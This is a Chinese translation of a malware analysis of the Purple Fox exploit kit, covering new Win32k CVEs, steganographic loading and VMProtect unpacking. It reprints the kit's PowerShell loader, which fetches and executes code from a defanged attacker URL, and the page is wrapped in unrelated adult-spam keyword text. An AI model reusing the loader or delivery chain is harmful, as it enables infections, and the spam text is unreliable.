精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

安全
Purple Fox屬于一種下載型木馬,能夠在感染目標計算機后下載其他惡意軟件,如加密貨幣挖礦惡意軟件。用戶一旦被感染,就將面臨各種各樣的威脅。

[[348952]]

Purple Fox屬于一種下載型木馬,能夠在感染目標計算機后下載其他惡意軟件,如加密貨幣挖礦惡意軟件。用戶一旦被感染,就將面臨各種各樣的威脅。

研究人員最近發現攻擊者利用Purple Fox攻擊工具包攻擊易受攻擊的Internet Explorer版本的次數激增。

調查顯示,Purple Fox反復嘗試通過公開可用的漏洞利用代碼,包括使用兩個最新的CVE-CVE-2020-1054和CVE-2019-0808。

此外,我們注意到他們的攻擊流程發生了其他變化,這些變化使他們可以采用隱寫術并通過代碼虛擬化技術覆蓋惡意代碼,從而更好地規避防火墻保護和某些檢測工具。

在最近幾年中,Purple Fox改進了其攻擊和傳播方法。它最初在2018年9月被發現,Purple Fox在2019年放棄使用NSIS(Nullsoft腳本可安裝系統)和Rig漏洞利用工具包,而是采用PowerShell來實現無文件執行。今年早些時候,ProofPoint詳細介紹了Purple Fox如何將CVE-2020-0674和CVE-2019-1458添加到其武器庫中。研究表明,Purple Fox已再次進行了迭代,添加了更多CVE以實現特權升級,并采用隱寫和虛擬化技術來避免檢測和妨礙安全人員分析。

有效載荷傳播流程

 

 在我們觀察到的攻擊中,通過廣告或僅通過單擊錯誤的URL將受害者定向到惡意站點。攻擊者將他們的惡意軟件托管在speedjudgmentacceleration[.]com上,并針對Internet Explorer用戶發起攻擊。

該漏洞利用VBScript代碼作為命令行運行mshta.exe,然后運行PowerShell。 PowerShell代碼從http[:]//rawcdn[.]githack[.]cyou/up.php?key=1下載并在內存中執行下一階段的代碼。

 

下一階段將遵循與以前版本的Purple Fox類似的模式,首先檢查它是否以管理員權限運行。如果是這樣,它將直接從攻擊者的站點安裝key = 2的MSI軟件包。否則,它會嘗試幾種不同的“本地特權升級”漏洞來首先提升。

新特權升級漏洞

在最新版本的Purple Fox中,攻擊者改進了兩點。

過去,Purple Fox會下載使用圖像文件擴展名(update.jpg)的本地特權升級(local privilege escalation, LPE)二進制文件,但它實際上是一個常規的可執行文件。適當的防火墻規則或安全軟件可以很容易地檢測到這種技術是惡意的。

現在,新版本的漏洞利用工具包將下載實際的映像文件(key = 3和key = 4),并使用隱寫術將每個LPE嵌入映像中。下面是一個使用的圖像示例:

[[348953]] 

 下載后,將其提取到內存中。以下代碼用于解碼和運行有效載荷:

  1. $uyxQcl8XomEdJUJd='sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http[:]//rawcdn[.]githack[.]cyou/up.php?key=3"));$o=a Byte[] 589824;(0..575)|%{foreach($x in(0..1023)){$p=$g.GetPixel($x,$_);$o[$_*1024+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..589362]))' 
  2.  
  3. IEX ($uyxQcl8XomEdJUJd) 

此外,現在正在利用兩個新的漏洞來幫助提升本地特權:CVE-2020-1054和CVE-2019-0808。兩者都是Win32k組件中的內核漏洞。 CVE-2020-1054于今年5月進行了修補。我們發現利用這些漏洞的攻擊者二進制文件分別在2020年8月11日和2020年9月10日進行了編譯。

該漏洞利用程序包含調試信息和大量信息字符串。例如,CVE-2020-1054上的調試路徑為:

  1. D:\Personal\Windows\Windows10\Desktop\CVE-2020-1054-master\CVE-2020-1054-master\x64\Release\CVE-2020-1054.pdb 

從編譯時的文件夾名稱可以看出,該代碼來自Git存儲庫。我們能夠快速將漏洞利用追溯到以下公共存儲庫:CVE-2020-1054,CVE-2019-0808。

不幸的是,到目前為止,在野外還沒有尋找到更多具有類似特征的二進制文件。

值得注意的是,所有的腳本都檢查HKCU\Software\7-Zip下一個特定且一致的注冊表值“StayOnTop”,設置此值似乎使惡意軟件能夠確定有效載荷是否成功運行。因此,在計算機注冊表中找到該值就可以表示Purple Fox做出了哪些攻擊。

Rootkit有效載荷

PowerShell腳本和特權升級利用的目的最終是在計算機上安裝rootkit。如何釋放有效載荷和Rootkit組件

趨勢科技表示,早期版本的“紫狐貍”使用了msi.dll的MsiInstallProductA 函數來下載并執行其有效載荷——一個.msi文件,其中包含加密的shellcode以及32位和64位版本的有效載荷。

一旦執行,它將重新啟動計算機并使用PendingFileRenameOperations注冊表(負責存儲操作系統重新啟動時將重命名的文件的名稱)以重命名其組件。

在重新啟動計算機后,它將使用其Rootkit功能(隱藏其文件和注冊表項)創建一個掛起的svchost進程并注入一個DLL,然后創建一個具有Rootkit功能的驅動程序。

在執行有效載荷之前,它還會在注入的DLL中設置以下內容:驅動程序文件(dump_ {random hex} .sys)——負責Rootkit功能,主組件是一個DLL文件(Ms {random hex} App.dll)。

然而,與早期版本不同,新版本“紫狐貍”選擇了使用開源代碼來啟用其Rootkit組件,包括隱藏并保護其文件和注冊表項。同樣值得注意的是,新版本“紫狐貍”還會使用一個文件實用程序軟件來隱藏其DLL組件,這阻止了逆向工程或破解嘗試。

但是,鑒于技術迭代帶來的變化,我們想檢查有效載荷方面是否還有任何新的發展。

我們在新域中找到了兩個版本的惡意軟件,它們都是rootkit的MSI安裝程序,其中一個丟失了文件。

安裝過程大致相同,重啟后,我們仍然看到使用PendingFileRenameOperations將文件放置在system32目錄下。然而,在MSI包中的CustomAction表有vbscript代碼,運行以下內容:

 Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

 有趣的是,這些命令直接來自微軟有關如何防御CVE-2020-0674漏洞(Internet Explorer RCE)的咨詢,該漏洞被Purple Fox使用來獲得初始訪問權限。我們推測保護新感染的計算機不受該漏洞的影響可能是為了阻止競爭對手。

從MSI軟件包中提取惡意軟件后,我們注意到有效載荷還具有一項重要的新功能,不過它現在受VMProtect保護。

從PE的分區表中可以輕松觀察到VMProtect的使用:

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

 “.vmp%d” 部分中的入口點清楚地表明了VMProtect

由于采用多種技術來隱藏原始代碼并對其進行模糊處理,因此安全研究人員的逆向處理變得更加困難了。

解壓縮VMProtect

逆向VMProtected二進制文件時,有兩個主要障礙需要克服:打包數據和虛擬指令。

我們首先必須解壓縮二進制文件中的數據,為此,我們使用了強大的x64dbg并打開了文件。之后,我們在VirtualProtect函數的開始處放置一個斷點:

想要記錄對該函數的所有調用,就要在“Log Text”框中輸入: 

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術 

VirtualProtect: lpAddress={a:[esp+4]}, dwSize={d:[esp+8]}, flNewProtect={x:[esp+C]} ;

運行它,直到它崩潰,給出如下輸出:

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

 可以看到數據可能被解壓縮到虛擬地址0x401000,因此我們要監控該地址,直到將數據寫入該地址為止。

重新啟動程序后,我們再次在VirtualProtect上放置一個斷點,并使該斷點命中八次。然后,我們將EIP設置為該地址,并使用x64dbg的內置Scylla插件轉儲二進制文件并修復其導入:

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

 這為我們提供了一個更小的,可調試的DLL文件,其中包含大量純文本字符串,以幫助我們調查惡意軟件。

DLL的代碼仍使用虛擬化的調用進行了模糊處理,但幸運的是,我們在字符串中找到了以下代碼:

Purple Fox攻擊流程中增加了新的CVE、隱寫術和虛擬化技術

 這類似于之前報告的rootkit版本,后者只是他們下載并編譯的公共rootkit。根據這些信息,我們推斷出他們并沒有實質性地升級rootkit的功能。

總結

Purple Fox開發工具包正在積極升級迭代中,正如我們自2018年9月以來以及在我們的研究中再次看到的那樣,惡意軟件開發者正在試圖繞過Microsoft補丁程序,以便針對那些組織和安全團隊利用公開的利用代碼而未能及時修補的漏洞。這個新的變種還通過采用隱寫術來隱藏LPE二進制文件,并利用商業軟件來保護其代碼不被分析,從而提高了其逃避檢測的能力。

 本文翻譯自:https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/如若轉載,請注明原文地址。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2022-02-10 10:52:09

網絡攻擊網絡安全漏洞

2021-02-02 16:34:12

useMemo性能優化函數

2021-04-08 20:48:00

Purple Fox惡意軟件Windows設備

2010-10-19 11:30:16

IT培訓

2022-05-30 16:19:40

惡意軟件僵尸網絡網絡攻擊

2022-03-08 18:07:59

漏洞CISA

2022-04-26 16:56:44

CISA漏洞攻擊

2009-01-12 16:25:40

電子郵件數據管理法規遵從

2023-11-20 18:28:37

2018-07-11 04:16:16

2024-04-16 11:49:08

2021-09-15 16:24:42

bot攻擊金融服務行業LexisNexis

2023-01-16 18:22:53

Discourse開源

2009-06-11 17:18:23

EJB3.1Singleton B

2012-04-30 20:44:55

2021-08-03 13:40:18

數字化

2021-08-30 07:45:45

網絡釣魚攻擊遠程工作

2022-08-08 10:42:39

物聯網物聯網技術

2015-10-19 17:36:19

MOST內核Linux

2021-07-28 10:27:00

惡意軟件云交付網絡攻擊
點贊
收藏

51CTO技術棧公眾號

伊人久久亚洲热| 亚洲精品无播放器在线播放| 成人黄色a**站在线观看| 欧美激情免费在线| www.免费av| 成人免费毛片嘿嘿连载视频…| 欧美激情一区不卡| 99久久精品免费看国产一区二区三区 | 亚洲视频欧美在线| 精品人妻一区二区三区含羞草| 99综合精品| 中文字幕av一区二区| 丰满饥渴老女人hd| 成人性生活av| 亚洲一区在线免费观看| 欧美成人免费在线| www.成人免费视频| 日本亚洲视频在线| 欧美激情亚洲视频| 波多野结衣喷潮| 猛男gaygay欧美视频| 欧美电影一区二区| 午夜肉伦伦影院| 在线欧美三级| 中文一区二区完整视频在线观看| 99热99热| 97在线播放免费观看| 亚洲尤物在线| 欧美激情一级精品国产| 青青青视频在线播放| 欧洲在线一区| 日韩网站在线看片你懂的| 久久久国产欧美| 涩涩视频在线播放| 亚洲一区二区视频在线观看| 亚洲免费在线精品一区| 欧美欧美欧美| 91在线观看免费视频| 成人午夜电影在线播放| 91精品人妻一区二区三区果冻| 国产美女精品| 91av成人在线| 欧美成人免费看| 亚洲乱码电影| 久久影视电视剧免费网站| 性猛交娇小69hd| 亚洲aa在线| 日韩精品www| 大尺度做爰床戏呻吟舒畅| 日韩高清一区| 精品国一区二区三区| 久久发布国产伦子伦精品| 国产亚洲久久| 欧美一区二区福利视频| 伊人免费视频二| 亚洲精品毛片| 91麻豆精品国产91久久久久久| 三级av免费观看| 成人在线免费电影网站| 欧美美女激情18p| 国内自拍第二页| 宅男噜噜噜66国产精品免费| 在线成人午夜影院| 在线观看一区二区三区视频| 老司机亚洲精品一区二区| 日韩欧美一区二区在线视频| 国产人妖在线观看| 高潮按摩久久久久久av免费| 亚洲精品久久久久久久久久久久久 | 亚洲区在线播放| 久久只有这里有精品| 精品国产乱码久久久| 日韩在线欧美在线| 国产人妻精品一区二区三区不卡| 黑丝一区二区三区| 97视频com| 手机av免费观看| 秋霞电影一区二区| 91在线精品播放| 色窝窝无码一区二区三区| 91视频在线看| 四虎影院一区二区三区 | 中文字幕亚洲区| 日日噜噜噜夜夜爽爽| 免费在线播放电影| 一本大道久久a久久精品综合| 日韩精品免费播放| 国产电影一区二区| 亚洲第一网中文字幕| 国产成人精品无码免费看夜聊软件| 精品一区二区三| 久久成人精品电影| 久久久国产精品成人免费| 日韩电影一区二区三区| 97se国产在线视频| 日韩精品视频无播放器在线看 | 九九精品在线视频| 天堂中文字幕在线观看| 精品一区二区久久| 国产一区二区免费在线观看| 高清福利在线观看| 亚洲午夜精品网| 我看黄色一级片| 成人在线视频你懂的| 国产亚洲激情在线| 久久露脸国语精品国产91| 蜜桃视频一区二区| 精品国产一区二区三区四区精华| 在线看黄色av| 天天综合日日夜夜精品| 91aaa精品| 精品国产一区二区三区四区| 欧美国产日韩在线| 中文字幕欧美人妻精品| 波多野洁衣一区| 手机看片日韩国产| 亚洲伦乱视频| 日韩精品亚洲视频| a级片在线观看免费| 秋霞成人午夜伦在线观看| 精品毛片久久久久久| 二区三区在线观看| 欧美日韩在线不卡| 国产精品揄拍100视频| 亚洲性人人天天夜夜摸| 国产在线视频91| 欧美亚洲日本| 午夜久久久久久久久久一区二区| 日韩在线一区视频| 不卡中文一二三区| 国产成人综合av| 青青青草原在线| 亚洲一区二区精品3399| 在线观看中文av| 国产精品精品| 国产在线视频91| 国产二区视频在线观看| 日韩欧美在线网址| 黄色在线观看av| 亚洲精品少妇| 国产一区二区高清视频| 白白色在线观看| 欧美一卡二卡在线| 亚洲成人生活片| 激情欧美日韩一区二区| 一本色道久久综合亚洲二区三区 | 美女脱光内衣内裤| 性色一区二区三区| 久久久久久草| 亚洲最大成人| 亚洲免费福利视频| 美女又爽又黄免费视频| 久久理论电影网| 久久无码高潮喷水| 免费欧美视频| 国产va免费精品高清在线观看| 免费人成在线观看网站| 色8久久人人97超碰香蕉987| 国产黄片一区二区三区| 久久综合亚州| 亚洲欧美一区二区原创| 午夜精品久久久久久毛片| 久久激情视频久久| www.午夜激情| 亚洲成人1区2区| 久久丫精品国产亚洲av不卡| 玖玖玖国产精品| 午夜精品福利一区二区| 亚洲影视资源| 欧美激情免费看| 青青免费在线视频| 欧美人牲a欧美精品| 成人涩涩小片视频日本| 国产a精品视频| 日韩小视频在线播放| 国产一区二区电影在线观看| 国产精品专区h在线观看| 黄色一级片在线观看| 欧美不卡视频一区| 久久国产视频一区| 亚洲欧洲日产国产综合网| 师生出轨h灌满了1v1| 中文日韩在线| 中日韩在线视频| 日韩中文在线| 国产99久久精品一区二区永久免费 | 国产精品一区二区在线免费观看| 99热精品在线| 亚洲精品日韩成人| 9l视频自拍蝌蚪9l视频成人| 欧美一级淫片丝袜脚交| 黄色在线免费| 亚洲精品网站在线播放gif| 伊人久久国产精品| 亚洲永久免费av| 免费在线观看污| 国产福利一区二区| 国产免费成人在线| 综合激情在线| 欧洲亚洲一区二区| 8x国产一区二区三区精品推荐| 日韩av手机在线观看| 1区2区3区在线视频| 亚洲人成网站免费播放| 精品国产区一区二| 色88888久久久久久影院野外| 麻豆疯狂做受xxxx高潮视频| 久久久国产一区二区三区四区小说| 91插插插影院| 日日夜夜一区二区| 青春草国产视频| 国产高清欧美| 欧美一区二区视频17c| av一级亚洲| 成人激情视频在线观看| 高清不卡亚洲| 国语自产精品视频在线看一大j8 | 中文字幕一区二区不卡 | 中文字幕亚洲在| www.黄色在线| 91丨九色丨尤物| 伊人av在线播放| 精品一区二区在线播放| 日韩毛片在线免费看| 亚洲承认在线| 欧美日韩午夜爽爽| 91精品啪在线观看国产81旧版| 欧美一区二区视频17c| 小嫩嫩12欧美| 久久国产欧美精品| 91成人精品在线| 91在线网站视频| 亚洲欧洲一二区| 国产狼人综合免费视频| 欧美黑人一区| 欧美一级高清免费播放| 91视频欧美| 午夜精品久久久久久久久久久久 | 四虎影视在线观看2413| 精品国产污网站| www日本高清| 日韩免费高清av| 性欧美18一19性猛交| 欧美一级二级三级乱码| 国产乱人乱偷精品视频| 欧美日韩aaa| 亚洲怡红院av| 911精品产国品一二三产区| 亚洲一级av毛片| 欧美美女一区二区在线观看| 91亚洲国产成人久久精品麻豆| 欧美日韩极品在线观看一区| 亚洲手机在线观看| 欧美日韩亚洲另类| 99国产精品久久久久99打野战| 欧美精品丝袜久久久中文字幕| 国产精品久久久久久在线| 欧美日韩精品高清| aaa级黄色片| 精品欧美一区二区在线观看| 免费a视频在线观看| 亚洲国产高清高潮精品美女| 午夜视频www| 亚洲欧美国产日韩天堂区| 第一福利在线| 久久精品在线播放| heyzo一区| 国产成人精品电影| av亚洲一区| dy888夜精品国产专区| aiai久久| 日本一区二区三区在线视频| 91日韩欧美| 女人被男人躁得好爽免费视频| 亚洲乱码视频| 在线免费观看视频黄| 国产东北露脸精品视频| 国产精品久久不卡| 欧美激情一区二区在线| 精国产品一区二区三区a片| 亚洲国产中文字幕在线视频综合| 天天干天天干天天| 欧美日韩精品三区| 蜜臀av免费在线观看| 亚洲一区二区福利| 亚洲无线看天堂av| 日本不卡免费高清视频| 国产激情一区| 九九99久久| 水蜜桃精品av一区二区| 国产xxxx振车| 日韩va欧美va亚洲va久久| 久久黄色一级视频| 久久久天堂av| 久久久国产成人| 在线一区二区视频| 蜜桃av噜噜一区二区三区麻豆| 亚洲天堂精品在线| 1024在线播放| 国产精品久久久久久亚洲调教| 欧美黄色一级| 日韩一区不卡| 99视频+国产日韩欧美| 天堂av8在线| 2021中文字幕一区亚洲| 五月天免费网站| 狠狠躁夜夜躁人人爽天天天天97| 国产欧美第一页| 亚洲图片在区色| 19禁羞羞电影院在线观看| 国产精品中文在线| 欧美日韩爱爱| 国产亚洲黄色片| 国产综合色视频| 在线观看免费黄色网址| 欧美午夜久久久| 亚洲免费视频网| 久久伊人免费视频| 国产国产一区| 日本不卡在线播放| 国产日韩亚洲| 黄色在线免费播放| 亚洲乱码国产乱码精品精98午夜 | 日韩在线欧美在线| 欧美色网在线| 精品国产一区二区三区麻豆小说 | 欧美区在线观看| 麻豆影视在线| 午夜免费日韩视频| 亚洲日本va午夜在线电影| 中文精品视频一区二区在线观看| 热久久久久久久| 日本理论中文字幕| 色猫猫国产区一区二在线视频| 无码国产精品一区二区免费16| 欧美夫妻性生活视频| 精品视频91| gogogo免费高清日本写真| 久久99精品一区二区三区三区| 久久久久久久久久久久| 色成人在线视频| 嫩草研究院在线观看| 日韩av成人在线观看| 日韩欧美天堂| 国产l精品国产亚洲区久久| 97se亚洲国产综合在线| 黄色片免费观看视频| 日韩国产欧美精品一区二区三区| 麻豆免费版在线观看| 精品免费日产一区一区三区免费| 一本色道久久综合亚洲精品不卡 | 国产chinesehd精品露脸| 亚洲免费观看在线视频| 午夜精品在线播放| 高清欧美性猛交xxxx黑人猛交| 高潮按摩久久久久久av免费| 男人和女人啪啪网站| 91麻豆123| 欧美日韩 一区二区三区| 中文字幕久久亚洲| 成人污版视频| 日韩国产小视频| 成人av网在线| 成年人晚上看的视频| 中文字幕一区二区精品| 国产一区二区| 免费在线看黄色片| 99国产麻豆精品| 国产情侣小视频| 欧美xxxx18性欧美| 国产精东传媒成人av电影| 日韩视频第二页| 国产精品久久久久久福利一牛影视 | 精品国产一区二区精华| 黄色18在线观看| 五月天综合网| 福利一区二区在线| 国产嫩bbwbbw高潮| 中文字幕免费精品一区| 一区二区中文字幕在线观看| 人妻熟妇乱又伦精品视频| 欧美韩国日本一区| 成人久久精品人妻一区二区三区| 欧美中文字幕视频| 99久久精品网| 你懂得在线视频| 欧美日韩国产一二三| 福利成人导航| 亚洲国产综合自拍| 成人在线视频首页| 在线播放国产一区| 97国产精品视频人人做人人爱| 欧美另类69xxxxx| 国产精品19p| 欧美日韩一区 二区 三区 久久精品| 呦呦在线视频| 日本一区不卡| 成人av电影在线播放| 97国产成人无码精品久久久| 51精品在线观看|